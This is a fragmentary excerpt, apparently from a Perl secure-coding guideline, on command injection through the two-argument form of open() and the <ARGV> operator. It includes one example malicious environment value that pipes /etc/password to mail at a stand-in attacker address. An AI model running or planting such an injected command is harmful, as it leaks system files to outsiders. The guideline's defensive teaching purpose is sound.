...
open FILEHANDLE,EXPR
open FILEHANDLE,MODE,EXPR
open FILEHANDLE,MODE,EXPR,LIST
open FILEHANDLE,MODE,REFERENCE
open FILEHANDLE
Opens the file whose filename file name is given by EXPR , and associates it with FILEHANDLE.
...
If $filename begins or ends with |, the preceding < forces it to be treated as a file name rather than a shell command.
This code will not execute a shell command. However, an attacker could cause a program to hang by supplying - as the file name. This , which is interpreted by open() as reading standard input.
...
This code suffers from the same vulnerability as the first noncompliant code example. The <ARGV> operator opens every file provided in the @ARGV array and returns a line from each file. Unfortunately, it uses the two-argument form of open() to accomplish this task. If any element of @ARGV begins or ends with |, it is interpreted as a shell command and executed.
...
Because any user can invoke the rt executable with environment variables he or she controls, a hostile user may set the RTCONFIG environment variable to a malicious command, such as:
| Code Block | ||
|---|---|---|
| ||
cat /etc/password | mail some@badguy.net | |
...
Tool | Version | Checker | Description |
|---|---|---|---|
Perl::Critic | 5.0 | InputOutput::ProhibitTwoArgOpen | Implemented |
B::Lint | 5.0 | Use of <> | Implemented |
Bibliography
...
...
...
...
...
...
...
...
...